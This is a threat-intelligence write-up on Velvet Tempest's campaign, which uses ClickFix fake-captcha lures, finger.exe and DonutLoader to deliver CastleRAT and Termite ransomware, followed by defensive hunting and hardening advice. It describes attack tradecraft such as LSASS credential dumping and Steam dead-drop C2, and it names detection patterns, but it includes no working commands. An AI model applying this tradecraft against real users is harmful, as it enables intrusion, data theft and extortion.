Velvet Tempest Operationalizes ClickFix as a Ransomware Delivery Engine
Cybersecurity researchers have linked a wave of Termite ransomware breaches to a sophisticated campaign by Velvet Tempest, a financially motivated threat actor tracked by Microsoft. The group is exploiting the ClickFix social-engineering technique to achieve initial access, then pivoting rapidly through DonutLoader and the CastleRAT backdoor before deploying double-extortion ransomware.
The campaign marks a significant evolution in ClickFix tradecraft — what began as a phishing lure to deliver infostealers is now being weaponized as the entry point for enterprise-scale ransomware operations.
Incident Details
| Attribute | Value |
|---|---|
| Threat Actor | Velvet Tempest (Microsoft tracking designation) |
| Ransomware Family | Termite |
| Initial Access | ClickFix social engineering via malvertising lures |
| Loaders Used | DonutLoader, native Windows utilities (finger.exe, cmd.exe) |
| Backdoor | CastleRAT (C and Python variants) |
| C2 Mechanism | Steam Community profile pages (dead-drop) + dedicated C2 domains |
| Extortion Model | Double extortion — data exfiltration prior to encryption |
| Known Prior Victims | Blue Yonder, Genea |
| Disclosure Date | March 7, 2026 |
How the Attack Works
Phase 1 — ClickFix Initial Access
ClickFix is a social-engineering technique that tricks users into manually executing malware by disguising malicious commands as routine troubleshooting steps. Velvet Tempest's lures direct victims to a malvertising page or compromised site that displays a fake verification or captcha prompt.
The victim is instructed to open the Windows Run dialog (Win+R) and paste in what appears to be a harmless command. The obfuscated command actually spawns a chain of nested cmd.exe processes and leverages finger.exe — a legacy TCP/79 utility present on all Windows systems — to pull initial payload loaders from attacker-controlled infrastructure.
This technique is effective because it exploits procedural trust: users who have performed IT troubleshooting steps before may not recognize that they are manually executing arbitrary code on their own system.
Phase 2 — DonutLoader Staging
The initial access payload drops DonutLoader, a shellcode-based loader that decrypts and executes in-memory payloads without writing them to disk. DonutLoader's fileless execution significantly complicates detection by EDR tools that rely on on-disk scanning.
DonutLoader then retrieves and injects CastleRAT, the group's primary backdoor, into a legitimate host process.
Phase 3 — CastleRAT Persistence and Reconnaissance
CastleRAT is a feature-rich remote access trojan available in both C and Python variants, attributed to the TAG150 threat cluster infrastructure operated by CastleLoader's developers. Key CastleRAT capabilities include:
- Persistent reverse shell with encrypted communications
- C2 beaconing via Steam Community profile pages as a dead-drop resolver (legitimate domain, harder to block)
- Dedicated C2 domain fallback with domain-fronting support
- Credential harvesting and browser data exfiltration
- Lateral movement via Pass-the-Hash and token impersonation
Phase 4 — Pre-Ransomware Recon and Data Theft
Before deploying ransomware, the operator conducts deliberate hands-on-keyboard activity:
- Network and host reconnaissance
- Active Directory enumeration
- Credential theft (LSASS dumping, credential store harvesting)
- Drive and share enumeration to identify high-value data repositories
- Bulk data exfiltration to attacker-controlled staging servers
This sequence — recon + credential theft + drive enumeration — should be treated as a pre-ransomware kill-chain indicator. Organizations that detect these behaviors in sequence have a narrow window to contain the breach before encryption begins.
Phase 5 — Termite Ransomware Deployment
Termite ransomware is deployed as the final stage. Velvet Tempest practices double extortion: stolen data is used as additional leverage, threatening publication on a leak site if ransom demands are not met. This approach has proven effective against large enterprises, including prior victims Blue Yonder (a supply chain management company) and Genea (an Australian healthcare provider).
Impact Assessment
| Impact Area | Description |
|---|---|
| Business Operations | Full file system encryption causes operational shutdown |
| Data Confidentiality | Exfiltrated data subject to public exposure |
| Financial | Ransom demands in the millions; recovery costs additional |
| Reputational | Customer data exposure and operational outages damage brand trust |
| Supply Chain | Prior victims include logistics and healthcare operators |
Recommendations
For Security Operations
- Hunt for ClickFix lure patterns — monitor proxy/DNS logs for visits to domains hosting fake captcha/verification pages; look for unusual
cmd.exechild process trees - Flag finger.exe usage —
finger.exenetwork activity is highly anomalous in enterprise environments; alert on any TCP/79 outbound connections - Detect DonutLoader injection — monitor for in-memory shellcode execution patterns, particularly from
cmd.exeorpowershell.exespawning unsigned process hollowing - Block Steam Community as C2 — implement URL categorization that flags
steamcommunity.comprofile page polling as potential C2 dead-drop activity in corporate environments - Alert on pre-ransomware recon TTPs — concurrent LSASS access,
net view,nltest, and large SMB share reads within a short time window are high-confidence ransomware precursors
For Endpoint Defense
- Disable
finger.exevia application allowlisting or removal if not operationally required - Enable Attack Surface Reduction (ASR) rules in Microsoft Defender, particularly rules blocking process creation from Office applications and blocking credential stealing from LSASS
- Deploy EDR behavioral detection for in-memory payload injection, especially DonutLoader's reflective loading technique
For Users
- Never paste commands from websites, emails, or pop-up prompts into the Windows Run dialog, PowerShell, or Command Prompt — legitimate software never requires this
- Report fake "verification" prompts immediately to your security team
Key Takeaways
- ClickFix is now a ransomware delivery channel — organizations should elevate ClickFix from an infostealer-tier threat to a ransomware precursor requiring incident-level response
- Velvet Tempest moves quickly — the documented TTPs show the group transitioning from initial ClickFix lure to hands-on-keyboard recon within hours of first access
- CastleRAT's Steam dead-drop is a detection challenge — network controls that block unknown C2 domains will not catch Steam Community profile polling without explicit URL-level inspection
- finger.exe is a reliable IOC — TCP/79 outbound traffic from Windows workstations is essentially noise-free in modern environments, making it a high-fidelity detection opportunity
- Pre-ransomware behaviors are the intervention window — detecting recon + credential theft + drive enumeration is the last opportunity to prevent encryption
- Double extortion amplifies impact — even organizations with robust backups face data exposure liability when Termite is involved